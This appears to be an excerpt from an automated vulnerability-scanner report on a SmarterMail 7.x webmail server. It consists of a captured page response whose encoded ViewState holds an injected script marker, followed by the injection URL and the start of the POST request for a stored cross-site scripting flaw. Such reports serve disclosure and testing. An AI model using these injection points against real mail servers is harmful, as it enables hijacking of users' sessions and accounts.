8JBQxTbWFydGVyVG9vbHMfCgYAAGjBKVyhCR4NT3JpZ2luYWxWYWx1ZWUfBmQeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8HaB8OBgBAyvij6OAHZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfCwKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHwsCggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHwsCggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHwsCggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8LAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfCwKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfCwKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawVZcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF93dWNDb250YWN0SW5mb19CaXJ0aERheVBpY2tlcl9TZXR0aW5nVGV4dCcpLCdjYWwnKTtkAgIPFCsADQ8WGgUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFEUVuYWJsZU11bHRpU2VsZWN0aAUPUmVuZGVySW52aXNpYmxlZwUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQRNaW5EBgBAyvij6OAHBQNFUlNoBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUSTmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWF4RAYAAGjBKVyhCQ8WCB8JBQxTbWFydGVyVG9vbHMfCGgfB2gfEWhkZBYEHw0FC3JjTWFpblRhYmxlHwsCAhYEHw0FDHJjT3RoZXJNb250aB8LAgJkFgQfDQUKcmNTZWxlY3RlZB8LAgJkFgQfDQUKcmNEaXNhYmxlZB8LAgIWBB8NBQxyY091dE9mUmFuZ2UfCwICFgQfDQUJcmNXZWVrZW5kHwsCAhYEHw0FB3JjSG92ZXIfCwICFgQfDQU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHwsCAhYEHw0FCXJjVmlld1NlbB8LAgJkAggPZBYCAgEPZBYCZg9kFgJmDw8WBB8NBQ5JbmRlbnQgU2V0dGluZx8LAgJkZAIKD2QWAgIBD2QWAmYPZBYEAgMPDxYCHwYFATFkZAIFDw8WAh8GBR08c2NyaXB0Pm5zKDB4MDA1Q0QxKTwvc2NyaXB0PmRkAgQPDxYCHwYFGmh0dHA6Ly9ob3l0Lm5ldDo5OTk4L01haW4vZGQYBgUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjMPMvwLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAACtVc2VyQ29udHJvbHMuQ29udGFjdEluZm9fQ29tcGFueUluZm9ybWF0aW9uAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAANcHZDb21wYW55SW5mbwtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiNA8y8wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAI1VzZXJDb250cm9scy5Db250YWN0SW5mb19DYXRlZ29yaWVzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAMcHZDYXRlZ29yaWVzC2QFF2N0bDAwJFRQSCRUYWJTdHJpcCRUYWI1DzL7CwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAnVXNlckNvbnRyb2xzLkNvbnRhY3RJbmZvX0FkZGl0aW9uYWxJbmZvAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAQcHZBZGRpdGlvbmFsSW5mbwtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAUzY3RsMDAkTVBIJHd1Y0NvbnRhY3RJbmZvJEJpcnRoRGF5UGlja2VyX1NldHRpbmdUZXh0BTxjdGwwMCRNUEgkd3VjQ29udGFjdEluZm8kQmlydGhEYXlQaWNrZXJfU2V0dGluZ1RleHQkY2FsZW5kYXIFPGN0bDAwJE1QSCR3dWNDb250YWN0SW5mbyRCaXJ0aERheVBpY2tlcl9TZXR0aW5nVGV4dCRjYWxlbmRhcgUwY3RsMDAkTVBIJHd1Y0NvbnRhY3RJbmZvJGNoa0NhdGVnb3J5XzU4MDc5NjAyOF8wBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMQ8y+AsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAKVVzZXJDb250cm9scy5Db250YWN0SW5mb19CYXNpY0luZm9ybWF0aW9uAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAALcHZCYXNpY0luZm8LZAUXY3RsMDAkVFBIJFRhYlN0cmlwJFRhYjIPMvwLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAACtVc2VyQ29udHJvbHMuQ29udGFjdEluZm9fQ29udGFjdEluZm9ybWF0aW9uAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAANcHZDb250YWN0SW5mbwtkbDC0+LvLQqRafK1teIFcxKhL0LQ=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQcUaVolINSsSmd45xIt6vT0&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWR9MeV9ZUBGsbQORxp8pY6I0fjnZzGUp1Vh7LOm8VmDBQ2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWQSEppX2FX7xGjssjmzh3aozGMCNxIa5fXHK-5EksyX-g2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFnLh1zs6-mYZ3jYkwjGi5OOeB5q262XchWnUM37uuuc4u4Eh6ZtFqwIWQgZDUBELcg2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFnLh1zs6-mYZ3jYkwjGi5OPZvXc391HAbgs03L_o9VOK82B8IiiN14y-pdC8rPOEvdX6kxin3NUH_a3R6GADuX01&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1PWslctYv3SyMb4XUFYFVUAUmpHu3v1jth73Pi-k7Mak1&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=TLc5eIFOuIYbyxvMGH2LFt43Y63-gGqTfdKbtXBAUWTKY4fr_B9-s_P9kwjvZ5D1o6y_K2I5aF0r3HOKggytHw2&amp;t=1a035eeb" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$ctl00','tctl00$MPH$wucContactInfo$UP1'], ['ctl00$BPH$btnSave'], [], 90);
//]]>
</scrip..
- /Main/frmNote.aspx

/Main/frmNote.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx

Injection Request

POST /Main/frmPopupContactCategories.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

